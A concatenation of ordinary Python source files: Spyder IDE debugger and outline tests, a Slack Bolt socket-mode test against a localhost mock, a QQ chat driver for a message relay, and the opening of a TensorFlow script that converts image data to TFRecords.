prev_file = tmpdir.join("foo.py")
prev_file.write("def zz(x):\n"
" return x**2\n")
CONF.set('editor', 'filenames', [str(prev_file)])
# Close project to open that file automatically
main_window.projects.close_project()
# Wait a bit for its tree to be filled
qtbot.wait(1000)
# Assert the editor was filled
editor = list(treewidget.editor_ids.keys())[0]
assert len(treewidget.editor_tree_cache[editor.get_id()]) > 0
# Remove test file from session
CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print(1 + 6)\nprint(1 + 6)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=1)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
CONF.set('ipython_console', 'pdb_prevent_closing', False)
# Check we can close a file we debug if the option is disabled
assert main_window.editor.get_current_editorstack().close_file()
CONF.set('ipython_console', 'pdb_prevent_closing', True)
# Check we are still debugging
assert shell.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
CONF.set('ipython_console', 'pdb_stop_first_line', False)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# The debugging should finish
qtbot.waitUntil(lambda: not shell.is_debugging())
CONF.set('ipython_console', 'pdb_stop_first_line', True)
# Check everything was executed
qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
# Open file in one of our directories without an __init__ file
spy_dir = osp.dirname(get_module_path('spyder'))
main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer._toggle_view_action.setChecked(True)
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Get tree length
treewidget = outline_explorer.explorer.treewidget
editor_id = list(treewidget.editor_ids.values())[1]
# Assert symbols in the file are detected and shown
assert len(treewidget.editor_tree_cache[editor_id]) > 0
if __name__ == "__main__":
pytest.main()
|
test_async_websockets.py
|
import asyncio
from threading import Thread
import pytest
from slack_sdk.web.async_client import AsyncWebClient
from slack_bolt.adapter.socket_mode.websockets import AsyncSocketModeHandler
from slack_bolt.app.async_app import AsyncApp
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
from ...adapter_tests.socket_mode.mock_socket_mode_server import (
start_socket_mode_server,
)
class TestSocketModeWebsockets:
valid_token = "xoxb-valid"
mock_api_server_base_url = "http://localhost:8888"
web_client = AsyncWebClient(
token=valid_token,
base_url=mock_api_server_base_url,
)
@pytest.fixture
def event_loop(self):
old_os_env = remove_os_env_temporarily()
try:
setup_mock_web_api_server(self)
loop = asyncio.get_event_loop()
yield loop
loop.close()
cleanup_mock_web_api_server(self)
finally:
restore_os_env(old_os_env)
@pytest.mark.asyncio
async def test_events(self):
t = Thread(target=start_socket_mode_server(self, 3022))
t.daemon = True
t.start()
await asyncio.sleep(1) # wait for the server
app = AsyncApp(client=self.web_client)
result = {"shortcut": False, "command": False}
@app.shortcut("do-something")
async def shortcut_handler(ack):
result["shortcut"] = True
await ack()
@app.command("/hello-socket-mode")
async def command_handler(ack):
result["command"] = True
await ack()
handler = AsyncSocketModeHandler(
app_token="xapp-A111-222-xyz",
app=app,
)
try:
handler.client.wss_uri = "ws://localhost:3022/link"
await handler.connect_async()
await asyncio.sleep(2) # wait for the message receiver
await handler.client.send_message("foo")
await asyncio.sleep(2)
assert result["shortcut"] is True
assert result["command"] is True
finally:
await handler.client.close()
self.server.stop()
self.server.close()
|
driver.py
|
from typing import Dict, List, Union
import threading
import asyncio
import json
from aiocqhttp import CQHttp, MessageSegment
from unified_message_relay.Core.UMRType import UnifiedMessage, MessageEntity, ChatType, EntityType
from unified_message_relay.Core import UMRDriver
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core.UMRMessageRelation import set_ingress_message_id, set_egress_message_id
from unified_message_relay.Util.Helper import unparse_entities_to_markdown
from unified_message_relay.Core import UMRConfig
from typing_extensions import Literal
from pydantic import Field
import re
import os
qq_emoji_list = { # created by JogleLew and jqqqqqqqqqq, optimized based on Tim's emoji support
0: '😮',
1: '😣',
2: '😍',
3: '😳',
4: '😎',
5: '😭',
6: '☺️',
7: '😷',
8: '😴',
9: '😭',
10: '😰',
11: '😡',
12: '😝',
13: '😃',
14: '🙂',
15: '🙁',
16: '🤓',
17: '[Empty]',
18: '😤',
19: '😨',
20: '😏',
21: '😊',
22: '🙄',
23: '😕',
24: '🤤',
25: '😪',
26: '😨',
27: '😓',
28: '😬',
29: '🤑',
30: '✊',
31: '😤',
32: '🤔',
33: '🤐',
34: '😵',
35: '😩',
36: '💣',
37: '💀',
38: '🔨',
39: '👋',
40: '[Empty]',
41: '😮',
42: '💑',
43: '🕺',
44: '[Empty]',
45: '[Empty]',
46: '🐷',
47: '[Empty]',
48: '[Empty]',
49: '🤷',
50: '[Empty]',
51: '[Empty]',
52: '[Empty]',
53: '🎂',
54: '⚡',
55: '💣',
56: '🔪',
57: '⚽️',
58: '[Empty]',
59: '💩',
60: '☕️',
61: '🍚',
62: '[Empty]',
63: '🌹',
64: '🥀',
65: '[Empty]',
66: '❤️',
67: '💔️',
68: '[Empty]',
69: '🎁',
70: '[Empty]',
71: '[Empty]',
72: '[Empty]',
73: '[Empty]',
74: '🌞️',
75: '🌃',
76: '👍',
77: '👎',
78: '🤝',
79: '✌️',
80: '[Empty]',
81: '[Empty]',
82: '[Empty]',
83: '[Empty]',
84: '[Empty]',
85: '🥰',
86: '[怄火]',
87: '[Empty]',
88: '[Empty]',
89: '🍉',
90: '[Empty]',
91: '[Empty]',
92: '[Empty]',
93: '[Empty]',
94: '[Empty]',
95: '[Empty]',
96: '😅',
97: '[擦汗]',
98: '[抠鼻]',
99: '👏',
100: '[糗大了]',
101: '😏',
102: '😏',
103: '😏',
104: '🥱',
105: '[鄙视]',
106: '😭',
107: '😭',
108: '[阴险]',
109: '😚',
110: '🙀',
111: '[可怜]',
112: '🔪',
113: '🍺',
114: '🏀',
115: '🏓',
116: '❤️',
117: '🐞',
118: '[抱拳]',
119: '[勾引]',
120: '✊',
121: '[差劲]',
122: '🤟',
123: '🚫',
124: '👌',
125: '[转圈]',
126: '[磕头]',
127: '[回头]',
128: '[跳绳]',
129: '👋',
130: '[激动]',
131: '[街舞]',
132: '😘',
133: '[左太极]',
134: '[右太极]',
135: '[Empty]',
136: '[双喜]',
137: '🧨',
138: '🏮',
139: '💰',
140: '[K歌]',
141: '🛍️',
142: '📧',
143: '[帅]',
144: '👏',
145: '🙏',
146: '[爆筋]',
147: '🍭',
148: '🍼',
149: '[下面]',
150: '🍌',
151: '🛩',
152: '🚗',
153: '🚅',
154: '[车厢]',
155: '[高铁右车头]',
156: '🌥',
157: '下雨',
158: '💵',
159: '🐼',
160: '💡',
161: '[风车]',
162: '⏰',
163: '🌂',
164: '[彩球]',
165: '💍',
166: '🛋',
167: '[纸巾]',
168: '💊',
169: '🔫',
170: '🐸',
171: '🍵',
172: '[眨眼睛]',
173: '😭',
174: '[无奈]',
175: '[卖萌]',
176: '[小纠结]',
177: '[喷血]',
178: '[斜眼笑]',
179: '[doge]',
180: '[惊喜]',
181: '[骚扰]',
182: '😹',
183: '[我最美]',
184: '🦀',
185: '[羊驼]',
186: '[Empty]',
187: '👻',
188: '🥚',
189: '[Empty]',
190: '🌼',
191: '[Empty]',
192: '🧧',
193: '😄',
194: '😞',
195: '[Empty]',
196: '[Empty]',
197: '[冷漠]',
198: '[呃]',
199: '👍',
200: '👋',
201: '👍',
202: '[无聊]',
203: '[托脸]',
204: '[吃]',
205: '💐',
206: '😨',
207: '[花痴]',
208: '[小样儿]',
209: '[Empty]',
210: '😭',
211: '[我不看]',
212: '[托腮]',
213: '[Empty]',
214: '😙',
215: '[糊脸]',
216: '[拍头]',
217: '[扯一扯]',
218: '[舔一舔]',
219: '[蹭一蹭]',
220: '[拽炸天]',
221: '[顶呱呱]',
222: '🤗',
223: '[暴击]',
224: '🔫',
225: '[撩一撩]',
226: '[拍桌]',
227: '👏',
228: '[恭喜]',
229: '🍻',
230: '[嘲讽]',
231: '[哼]',
232: '[佛系]',
233: '[掐一掐]',
234: '😮',
235: '[颤抖]',
236: '[啃头]',
237: '[偷看]',
238: '[扇脸]',
239: '[原谅]',
240: '[喷脸]',
241: '🎂',
242: '[Empty]',
243: '[Empty]',
244: '[Empty]',
245: '[Empty]',
246: '[Empty]',
247: '[Empty]',
248: '[Empty]',
249: '[Empty]',
250: '[Empty]',
251: '[Empty]',
252: '[Empty]',
253: '[Empty]',
254: '[Empty]',
255: '[Empty]',
}
# original text copied from Tim
qq_emoji_text_list = {
0: '[惊讶]',
1: '[撇嘴]',
2: '[色]',
3: '[发呆]',
4: '[得意]',
5: '[流泪]',
6: '[害羞]',
7: '[闭嘴]',
8: '[睡]',
9: '[大哭]',
10: '[尴尬]',
11: '[发怒]',
12: '[调皮]',
13: '[呲牙]',
14: '[微笑]',
15: '[难过]',
16: '[酷]',
17: '[Empty]',
18: '[抓狂]',
19: '[吐]',
20: '[偷笑]',
21: '[可爱]',
22: '[白眼]',
23: '[傲慢]',
24: '[饥饿]',
25: '[困]',
26: '[惊恐]',
27: '[流汗]',
28: '[憨笑]',
29: '[悠闲]',
30: '[奋斗]',
31: '[咒骂]',
32: '[疑问]',
33: '[嘘]',
34: '[晕]',
35: '[折磨]',
36: '[衰]',
37: '[骷髅]',
38: '[敲打]',
39: '[再见]',
40: '[Empty]',
41: '[发抖]',
42: '[爱情]',
43: '[跳跳]',
44: '[Empty]',
45: '[Empty]',
46: '[猪头]',
47: '[Empty]',
48: '[Empty]',
49: '[拥抱]',
50: '[Empty]',
51: '[Empty]',
52: '[Empty]',
53: '[蛋糕]',
54: '[闪电]',
55: '[炸弹]',
56: '[刀]',
57: '[足球]',
58: '[Empty]',
59: '[便便]',
60: '[咖啡]',
61: '[饭]',
62: '[Empty]',
63: '[玫瑰]',
64: '[凋谢]',
65: '[Empty]',
66: '[爱心]',
67: '[心碎]',
68: '[Empty]',
69: '[礼物]',
70: '[Empty]',
71: '[Empty]',
72: '[Empty]',
73: '[Empty]',
74: '[太阳]',
75: '[月亮]',
76: '[赞]',
77: '[踩]',
78: '[握手]',
79: '[胜利]',
80: '[Empty]',
81: '[Empty]',
82: '[Empty]',
83: '[Empty]',
84: '[Empty]',
85: '[飞吻]',
86: '[怄火]',
87: '[Empty]',
88: '[Empty]',
89: '[西瓜]',
90: '[Empty]',
91: '[Empty]',
92: '[Empty]',
93: '[Empty]',
94: '[Empty]',
95: '[Empty]',
96: '[冷汗]',
97: '[擦汗]',
98: '[抠鼻]',
99: '[鼓掌]',
100: '[糗大了]',
101: '[坏笑]',
102: '[左哼哼]',
103: '[右哼哼]',
104: '[哈欠]',
105: '[鄙视]',
106: '[委屈]',
107: '[快哭了]',
108: '[阴险]',
109: '[亲亲]',
110: '[吓]',
111: '[可怜]',
112: '[菜刀]',
113: '[啤酒]',
114: '[篮球]',
115: '[乒乓]',
116: '[示爱]',
117: '[瓢虫]',
118: '[抱拳]',
119: '[勾引]',
120: '[拳头]',
121: '[差劲]',
122: '[爱你]',
123: '[NO]',
124: '[OK]',
125: '[转圈]',
126: '[磕头]',
127: '[回头]',
128: '[跳绳]',
129: '[挥手]',
130: '[激动]',
131: '[街舞]',
132: '[献吻]',
133: '[左太极]',
134: '[右太极]',
135: '[Empty]',
136: '[双喜]',
137: '[鞭炮]',
138: '[灯笼]',
139: '[发财]',
140: '[K歌]',
141: '[购物]',
142: '[邮件]',
143: '[帅]',
144: '[喝彩]',
145: '[祈祷]',
146: '[爆筋]',
147: '[棒棒糖]',
148: '[喝奶]',
149: '[下面]',
150: '[香蕉]',
151: '[飞机]',
152: '[开车]',
153: '[高铁左车头]',
154: '[车厢]',
155: '[高铁右车头]',
156: '[多云]',
157: '[下雨]',
158: '[钞票]',
159: '[熊猫]',
160: '[灯泡]',
161: '[风车]',
162: '[闹钟]',
163: '[打伞]',
164: '[彩球]',
165: '[钻戒]',
166: '[沙发]',
167: '[纸巾]',
168: '[药]',
169: '[手枪]',
170: '[青蛙]',
171: '[茶]',
172: '[眨眼睛]',
173: '[泪奔]',
174: '[无奈]',
175: '[卖萌]',
176: '[小纠结]',
177: '[喷血]',
178: '[斜眼笑]',
179: '[doge]',
180: '[惊喜]',
181: '[骚扰]',
182: '[笑哭]',
183: '[我最美]',
184: '[河蟹]',
185: '[羊驼]',
186: '[Empty]',
187: '[幽灵]',
188: '[蛋]',
189: '[Empty]',
190: '[菊花]',
191: '[Empty]',
192: '[红包]',
193: '[大笑]',
194: '[不开心]',
195: '[Empty]',
196: '[Empty]',
197: '[冷漠]',
198: '[呃]',
199: '[好棒]',
200: '[拜托]',
201: '[点赞]',
202: '[无聊]',
203: '[托脸]',
204: '[吃]',
205: '[送花]',
206: '[害怕]',
207: '[花痴]',
208: '[小样儿]',
209: '[Empty]',
210: '[飙泪]',
211: '[我不看]',
212: '[托腮]',
213: '[Empty]',
214: '[啵啵]',
215: '[糊脸]',
216: '[拍头]',
217: '[扯一扯]',
218: '[舔一舔]',
219: '[蹭一蹭]',
220: '[拽炸天]',
221: '[顶呱呱]',
222: '[抱抱]',
223: '[暴击]',
224: '[开枪]',
225: '[撩一撩]',
226: '[拍桌]',
227: '[拍手]',
228: '[恭喜]',
229: '[干杯]',
230: '[嘲讽]',
231: '[哼]',
232: '[佛系]',
233: '[掐一掐]',
234: '[惊呆]',
235: '[颤抖]',
236: '[啃头]',
237: '[偷看]',
238: '[扇脸]',
239: '[原谅]',
240: '[喷脸]',
241: '[生日快乐]',
242: '[Empty]',
243: '[Empty]',
244: '[Empty]',
245: '[Empty]',
246: '[Empty]',
247: '[Empty]',
248: '[Empty]',
249: '[Empty]',
250: '[Empty]',
251: '[Empty]',
252: '[Empty]',
253: '[Empty]',
254: '[Empty]',
255: '[Empty]',
}
qq_sface_list = {
1: '[拜拜]',
2: '[鄙视]',
3: '[菜刀]',
4: '[沧桑]',
5: '[馋了]',
6: '[吃惊]',
7: '[微笑]',
8: '[得意]',
9: '[嘚瑟]',
10: '[瞪眼]',
11: '[震惊]',
12: '[鼓掌]',
13: '[害羞]',
14: '[好的]',
15: '[惊呆了]',
16: '[静静看]',
17: '[可爱]',
18: '[困]',
19: '[脸红]',
20: '[你懂的]',
21: '[期待]',
22: '[亲亲]',
23: '[伤心]',
24: '[生气]',
25: '[摇摆]',
26: '[帅]',
27: '[思考]',
28: '[震惊哭]',
29: '[痛心]',
30: '[偷笑]',
31: '[挖鼻孔]',
32: '[抓狂]',
33: '[笑着哭]',
34: '[无语]',
35: '[捂脸]',
36: '[喜欢]',
37: '[笑哭]',
38: '[疑惑]',
39: '[赞]',
40: '[眨眼]'
}
class QQDriverConfig(UMRConfig.BaseDriverConfig):
Base: Literal['QQ']
Account: int
APIRoot: str
ListenIP: str
ListenPort: int = Field(8080, ge=0, le=65535)
Token: str
Secret: str
IsPro: bool = False
NameforPrivateChat: bool = True
NameforGroupChat = True
UMRConfig.register_driver_config(QQDriverConfig)
class QQDriver(UMRDriver.BaseDriverMixin):
def __init__(self, name):
super().__init__(name)
self.name = name
self.logger = UMRLogging.get_logger(f'UMRDriver.{self.name}')
self.logger.debug(f'Started initialization for {self.name}')
self.loop: asyncio.AbstractEventLoop = asyncio.new_event_loop()
self.loop.set_exception_handler(self.handle_exception)
self.config: QQDriverConfig = UMRConfig.config.Driver[self.name]
self.bot = CQHttp(api_root=self.config.APIRoot,
access_token=self.config.Token,
secret=self.config.Secret)
##### initializations #####
# get group list
self.group_list: Dict[int, Dict[int, Dict]] = dict() # Dict[group_id, Dict[member_id, member_info]]
# see https://cqhttp.cc/docs/4.13/#/API?id=响应数据23
self.is_coolq_pro = self.config.IsPro # todo initialization on startup
self.stranger_list: Dict[int, str] = dict()
@self.bot.on_message()
async def handle_msg(context):
message_type = context.get("message_type")
chat_id = context.get(f'{message_type}_id', context.get('user_id'))
chat_type = ChatType(message_type)
self.logger.debug(f'Received message: {str(context)}')
unified_message_list = await self.dissemble_message(context)
set_ingress_message_id(src_platform=self.name, src_chat_id=chat_id, src_chat_type=chat_type,
src_message_id=context.get('message_id'), user_id=context.get('user_id'))
for message in unified_message_list:
await self.receive(message)
return {}
@self.bot.on_request()
async def handle_request(context):
self.logger.debug('received request: ' + str(context))
return {}
def start(self):
def run():
asyncio.set_event_loop(self.loop)
self.logger.debug(f'Starting Quart server for {self.name}')
task = self.bot._server_app.run_task(host=self.config.ListenIP,
port=self.config.ListenPort)
self.loop.create_task(task)
self.loop.run_forever()
t = threading.Thread(target=run)
t.daemon = True
UMRDriver.threads.append(t)
t.start()
self.logger.debug(f'Finished initialization for {self.name}')
##### Define send and receive #####
async def send(self, to_chat: Union[int, str], chat_type: ChatType, messsage: UnifiedMessage):
"""
:return:
"""
self.logger.debug('calling real send')
return asyncio.run_coroutine_threadsafe(self._send(to_chat, chat_type, messsage), self.loop)
async def _send(self, to_chat: int, chat_type: ChatType, message: UnifiedMessage):
"""
:return:
"""
self.logger.debug('begin processing message')
context = dict()
if chat_type == ChatType.UNSPECIFIED:
self.logger.warning(f'Sending to undefined group or chat {to_chat}')
return
context['message_type'] = f'{chat_type}'
context['message'] = list()
if message.image:
image_name = os.path.basename(message.image)
context['message'].append(MessageSegment.image(image_name))
if (chat_type == ChatType.PRIVATE and self.config.NameforPrivateChat) or \
(chat_type in (ChatType.GROUP, ChatType.DISCUSS) and self.config.NameforGroupChat):
# name logic
if message.chat_attrs.name:
context['message'].append(MessageSegment.text(message.chat_attrs.name))
if message.chat_attrs.reply_to:
context['message'].append(MessageSegment.text(' (➡️️' + message.chat_attrs.reply_to.name + ')'))
if message.chat_attrs.forward_from:
context['message'].append(MessageSegment.text(' (️️↩️' + message.chat_attrs.forward_from.name + ')'))
if message.chat_attrs.name:
context['message'].append(MessageSegment.text(': '))
# at user
if message.send_action.user_id:
context['message'].append(MessageSegment.at(message.send_action.user_id))
context['message'].append(MessageSegment.text(' '))
context['message'].append(MessageSegment.text(message.text))
if chat_type == ChatType.PRIVATE:
context['user_id'] = to_chat
else:
context[f'{chat_type}_id'] = to_chat
self.logger.debug('finished processing message, ready to send')
result = await self.bot.send(context, context['message'])
if message.chat_attrs:
set_egress_message_id(src_platform=message.chat_attrs.platform,
src_chat_id=message.chat_attrs.chat_id,
src_chat_type=message.chat_attrs.chat_type,
src_message_id=message.chat_attrs.message_id,
dst_platform=self.name,
dst_chat_id=to_chat,
dst_chat_type=chat_type,
dst_message_id=result.get('message_id'),
user_id=self.config.Account)
self.logger.debug('finished sending')
return result.get('message_id')
async def get_username(self, user_id: int, chat_id: int, chat_type: ChatType):
if user_id == self.config.Account:
return 'bot'
if user_id == 1000000:
return 'App message'
if chat_type == ChatType.GROUP:
user = await self.bot.get_group_member_info(group_id=chat_id, user_id=user_id)
username = user.get('card')
if not username:
username = user.get('nickname', str(user_id))
else:
user = await self.bot.get_stranger_info(user_id=user_id)
username = user.get('nickname', str(user_id))
if username == 'mpqqnickname':
username = 'TencentBot'
return username
async def dissemble_message(self, context):
# group_id = context.get('group_id')
# user_id = context.get('user_id')
# user = group_list.get(group_id, dict()).get(user_id, dict())
# username = user.get('nickname', str(user_id))
# for i in range(len(context['message'])):
# message = UnifiedMessage(from_platform=self.name, from_chat=group_id, from_user=username,
# message=context.get('raw_message'))
chat_type = ChatType(context.get('message_type'))
if chat_type in ('group', 'discuss'):
chat_id = context.get(f'{chat_type}_id')
else:
chat_id = context.get('user_id')
user_id = context.get('user_id')
message_id = context.get('message_id')
user = context.get('sender')
username = user.get('card')
if not username:
username = user.get('nickname', str(user_id))
message: List[Dict] = context['message']
unified_message = await self.parse_special_message(chat_id, chat_type, username, message_id, user_id, message)
if unified_message:
return [unified_message]
unified_message_list = await self.parse_message(chat_id, chat_type, username, message_id, user_id, message)
return unified_message_list
async def parse_special_message(self, chat_id: int, chat_type: ChatType, username: str, message_id: int, user_id: int,
message: List[Dict[str, Dict[str, str]]]):
if len(message) > 1:
return None
message = message[0]
message_type = message['type']
message = message['data']
unified_message = UnifiedMessage(platform=self.name,
chat_id=chat_id,
chat_type=chat_type,
name=username,
user_id=user_id,
message_id=message_id)
if message_type == 'share':
unified_message.text = 'Shared '
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(message['title']),
entity_type=EntityType.LINK,
link=message['url']))
unified_message.text += message['title']
elif message_type == 'rich':
if 'url' in message:
url = message['url']
if url.startswith('mqqapi'):
cq_location_regex = re.compile(r'^mqqapi:.*lat=(.*)&lon=(.*)&title=(.*)&loc=(.*)&.*$')
locations = cq_location_regex.findall(message['url']) # [('lat', 'lon', 'name', 'addr')]
unified_message.text = f'Shared a location: {locations[2]}, {locations[3]}, {locations[0]}, {locations[1]}'
else:
unified_message.text = message.get('title', message.get('text'))
unified_message.text_entities.append(
MessageEntity(start=0,
end=len(unified_message.text),
entity_type=EntityType.LINK,
link=message['url']))
elif 'title' in message:
if 'content' in message:
try:
content = json.loads(message['content'])
if 'news' in content:
unified_message.text = 'Shared '
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(message['title']),
entity_type=EntityType.LINK,
link=content.get('jumpUrl')))
unified_message.text += message['title'] + ' ' + message.get('desc')
elif 'weather' in content:
unified_message.text = message['title']
else:
self.logger.debug(f'Got miscellaneous rich text message with content: {str(message)}')
unified_message.text = message['title']
except:
self.logger.exception(f'Cannot decode json: {str(message)}')
unified_message.text = message['title']
else:
unified_message.text = message['title']
else:
self.logger.debug(f'Got miscellaneous rich text message: {str(message)}')
unified_message.text = message.get('text', str(message))
elif message_type == 'dice':
unified_message.text = 'Rolled '
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(message['type']),
entity_type=EntityType.BOLD))
unified_message.text += message['type']
elif message_type == 'rps':
unified_message.text = 'Played '
played = {'1': 'Rock',
'2': 'Scissors',
'3': 'Paper'}[message['type']]
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(played),
entity_type=EntityType.BOLD))
unified_message.text += played
elif message_type == 'shake':
unified_message.text = 'Sent you a shake'
elif message_type == 'music':
if message['type'].startswith('163'):
unified_message.text = 'Shared a music: '
music_title = 'Netease Music'
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(music_title),
entity_type=EntityType.LINK,
link=f'https://music.163.com/song?id={message["id"]}'))
unified_message += music_title
elif message['type'].startswith('qq'):
unified_message.text = 'Shared a music: '
music_title = 'Netease Music'
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(music_title),
entity_type=EntityType.LINK,
link=f'https://y.qq.com/n/yqq/song/{message["id"]}_num.html'))
unified_message += music_title
else:
self.logger.debug(f'Got unseen music share message: {str(message)}')
unified_message.text = 'Shared a music: ' + str(message)
elif message_type == 'record':
unified_message.text = 'Unsupported voice record, please view on QQ'
elif message_type == 'bface':
unified_message.text = 'Unsupported big face, please view on QQ'
elif message_type == 'sign':
unified_message.image = message['image']
sign_text = f'Sign at location: {message["location"]} with title: {message["title"]}'
unified_message.text = sign_text
else:
return
return unified_message
async def parse_message(self, chat_id: int, chat_type: ChatType, username: str, message_id: int, user_id: int,
message: List[Dict[str, Dict[str, str]]]):
message_list = list()
unified_message = UnifiedMessage(platform=self.name,
chat_id=chat_id,
chat_type=chat_type,
name=username,
user_id=user_id,
message_id=message_id)
for m in message:
message_type = m['type']
m = m['data']
if message_type == 'image':
# message not empty or contained a image, append to list
if unified_message.text or unified_message.image:
message_list.append(unified_message)
unified_message = UnifiedMessage(platform=self.name,
chat_id=chat_id,
chat_type=chat_type,
name=username,
user_id=user_id,
message_id=message_id)
unified_message.image = m['url']
elif message_type == 'text':
unified_message.text += m['text']
elif message_type == 'at':
target = await self.get_username(int(m['qq']), chat_id, chat_type)
at_user_text = '@' + target
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(at_user_text),
entity_type=EntityType.BOLD))
unified_message.text += at_user_text
elif message_type == 'sface':
qq_face = int(m['id']) & 255
if qq_face in qq_sface_list:
unified_message.text += qq_sface_list[qq_face]
else:
unified_message.text += '\u2753' # ❓
elif message_type == 'face':
qq_face = int(m['id'])
if qq_face in qq_emoji_list:
unified_message.text += qq_emoji_list[qq_face]
else:
unified_message.text += '\u2753' # ❓
else:
self.logger.debug(f'Unhandled message type: {str(m)} with type: {message_type}')
message_list.append(unified_message)
return message_list
async def is_group_admin(self, chat_id: int, chat_type: ChatType, user_id: int):
if chat_type != ChatType.GROUP:
return False
if chat_id not in self.group_list:
return False
return self.group_list[chat_id][user_id]['role'] in ('owner', 'admin')
async def is_group_owner(self, chat_id: int, chat_type: ChatType, user_id: int):
if chat_type != ChatType.GROUP:
return False
if chat_id not in self.group_list:
return False
return self.group_list[chat_id][user_id]['role'] == 'owner'
def handle_exception(self, loop, context):
# context["message"] will always be there; but context["exception"] may not
msg = context.get("exception", context["message"])
self.logger.exception('Unhandled exception: ', exc_info=msg)
UMRDriver.register_driver('QQ', QQDriver)
|
build_image_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import sys
import threading
from datetime import datetime
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
